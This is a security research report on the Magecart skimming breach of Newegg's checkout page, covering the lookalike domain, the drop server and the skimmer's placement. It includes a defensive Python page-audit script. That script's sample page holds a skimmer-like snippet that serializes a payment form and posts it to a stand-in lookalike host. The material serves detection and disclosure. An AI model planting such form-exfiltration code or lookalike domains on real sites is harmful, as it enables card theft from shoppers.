RiskIQ conducted the research for this report in collaboration with Volexity, which will release a separate report of its own. From different perspectives, we will discuss the same incident, showing how we found and analyzed the latest instance of Magecart using our unique capabilities and datasets.
While the dust is settling on the British Airways compromise, the Magecart actor behind it has not stopped their work, hitting yet another large merchant: Newegg.
Last week we published details on the British Airways compromise immediately after the company made its first advisory public linking the breach of customer credit card information to Magecart. We were able to disclose these details based on our years of tracking the activities and infrastructure of the umbrella of Magecart groups performing digital credit card skimming campaigns. The British Airways cyber attack was highly targeted and done via a tactic we’d seen evolving through the years.
The report on the British Airways cyber attack came shortly after our discovery that Magecart was also behind the breach of Ticketmaster. As we have built this narrative, it has become clear to the industry that these simple yet clever cyber attacks are not only devastating but also increasingly prevalent. Newegg is just the latest victim.
The breach of Newegg shows the true extent of Magecart operators’ reach. These cyber attacks are not confined to certain geolocations or specific industries—any organization that processes payments online is a target. The elements of the British Airways cyber attacks were all present in the cyber attack on Newegg: they integrated with the victim’s payment system and blended with the infrastructure, staying there as long as possible.
On August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in with Newegg’s primary domain, newegg.com. Registered through Namecheap, the malicious domain initially pointed to a standard parking host. However, the actors changed it to 188.8.131.52 a day later, a Magecart drop server where their skimmer backend runs to receive skimmed credit card information. Similar to the British Airways cyber attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page:
Fig-1 Cert used in the cyber attack
At this point, the server was ready for a cyber attack—an attack against the customers of newegg.com. Around August 14th, the cyber attackers placed the skimmer code on Newegg, managing to integrate it into the checkout process and disguise it well.
When a customer wants to buy a product they have to go through the following steps:
The skimmer was put on the payment processing page itself, not in a separate script, so it would not load unless the payment page was hit. Hitting that page means a customer went through the first two steps—they would not be able to reach the checkout page without putting something in a cart and entering a validated address.
The URL for the page that would return the skimmer was:
https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx
Integrating with this process hid the skimmer and might help explain how it was on the Newegg website for more than a month.
The skimmer code is recognizable from the British Airways incident, with the same base code. All the cyber attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways. In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script:
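The integration described above, where the skimmer sits inline on the payment page, serializes the checkout form and posts it to a brand-themed domain on a separate drop server, points at what a defender can monitor for. The following Python script is an added example, not RiskIQ's tooling or Newegg's code: it audits the script elements of a constructed checkout page, flags inline scripts that serialize a form and reference a host outside the first-party domain, flags hosts that embed the brand name without belonging to it (the neweggstats.com pattern), and hashes each inline script so a change from an approved baseline stands out. The sample page, the example-shop.com first-party domain and the brand tokens are constructed assumptions.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed checkout page for this example (not Newegg's or RiskIQ's code).
# Script 1 is a benign first-party beacon; script 2 mimics the pattern described
# above: serialize the payment form, then POST it to a brand-themed lookalike host.
SAMPLE_PAGE = """
<html><body>
<form id="checkout"><input name="card"/></form>
<script src="https://cdn.example-shop.com/checkout.js"></script>
<script>
  fetch("https://secure.example-shop.com/api/metrics", {method: "POST", body: "{}"});
</script>
<script>
  var d = JSON.stringify($("#checkout").serializeArray());
  $.ajax({type: "POST", url: "https://example-shopstats.com/collect", data: d});
</script>
</body></html>
"""

# Assumed first-party registrable domain and brand strings (hypothetical values).
FIRST_PARTY = {"example-shop.com"}
BRAND_TOKENS = ("example-shop", "exampleshop")

SCRIPT_RE = re.compile(r"<script(?P<attrs>[^>]*)>(?P<body>.*?)</script>", re.S | re.I)
SRC_RE = re.compile(r"""src=["']([^"']+)["']""", re.I)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
SERIALIZE_RE = re.compile(r"\.serialize(Array)?\s*\(|new\s+FormData\s*\(", re.I)


def registrable(host):
    """Crude registrable-domain cut (last two labels); enough for this sample."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def is_lookalike(host):
    """True if the host embeds a brand token but is not under a first-party domain."""
    if registrable(host) in FIRST_PARTY:
        return False
    return any(tok in host.lower() for tok in BRAND_TOKENS)


def audit_page(html, first_party=FIRST_PARTY):
    """Return one finding per <script> element, flagging skimmer-like ones."""
    findings = []
    for idx, m in enumerate(SCRIPT_RE.finditer(html)):
        attrs, body = m.group("attrs"), m.group("body")
        src = SRC_RE.search(attrs)
        src_host = urlparse(src.group(1)).hostname if src else None
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)} - {None}
        third_party = sorted(h for h in hosts if registrable(h) not in first_party)
        lookalikes = sorted(h for h in third_party if is_lookalike(h))
        serializes = bool(SERIALIZE_RE.search(body))
        findings.append({
            "index": idx,
            "kind": "external" if src else "inline",
            "src_host": src_host,
            "sha256": hashlib.sha256(body.encode()).hexdigest(),
            "third_party_hosts": third_party,
            "lookalike_hosts": lookalikes,
            "serializes_form": serializes,
            # Either signal alone is noisy; form serialization plus an off-domain
            # destination, or any brand-themed lookalike host, merits a look.
            "suspicious": bool(lookalikes) or (serializes and bool(third_party)),
        })
    return findings


def unknown_inline_scripts(findings, known_hashes):
    """Integrity check: inline scripts whose hash is not in the approved baseline."""
    return [f["index"] for f in findings
            if f["kind"] == "inline" and f["sha256"] not in known_hashes]


if __name__ == "__main__":
    results = audit_page(SAMPLE_PAGE)
    for f in results:
        print(f["index"], f["kind"], "SUSPICIOUS" if f["suspicious"] else "ok",
              f["lookalike_hosts"])
    baseline = {results[1]["sha256"]}  # pretend only the beacon was approved
    print("inline scripts not in baseline:", unknown_inline_scripts(results, baseline))
```

Run against a fetched copy of the real checkout page on a schedule, the baseline hash set is what catches a change like the one described here, since a skimmer that blends into the page still alters the inline script bytes; the lookalike and serialization heuristics then tell the analyst which change to look at first.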
Fig-2 15 lines of script, smaller than the British Airways cyber attack
The first time the skimmer became active was around August 14th, and we confirmed the skimmer was removed on September 18th, which means the cyber attackers had a full month of skimming Newegg customers. Conveniently for the cyber attackers, the skimmer, just like in the British Airways cyber attack, works for both desktop and mobile customers.
With the size of the business evaluated at $2.65 billion in 2016, Newegg is an extremely popular retailer. Alexa ranks Newegg as the 161st most popular site in the U.S., and Similarweb, which also gathers information on site visits, estimates Newegg receives over 50 million visitors a month. Over an entire month of skimming, we can assume this cyber attack claimed a massive number of victims.
Magecart cyber attacks are surging—RiskIQ’s automatic detection of Magecart breaches pings us almost hourly. Meanwhile, we’re seeing cyber attackers evolve and improve over time, setting their sights on breaches of large brands. While some Magecart groups still target smaller shops, the subgroup responsible for the cyber attacks against Newegg and British Airways is particularly audacious, performing cunning, highly targeted cyber attacks with skimmers that seamlessly integrate into their targets’ websites.
The cyber attack on Newegg shows that while third parties have been a problem for websites—as in the case of the Ticketmaster breach—self-hosted scripts help cyber attackers move and evolve, in this case changing the actual payment processing pages to place their skimmer.
We urge banks to issue new cards, or add protection through OTP, for cards they can correlate to transactions that occurred on Newegg between August 14th and September 18th.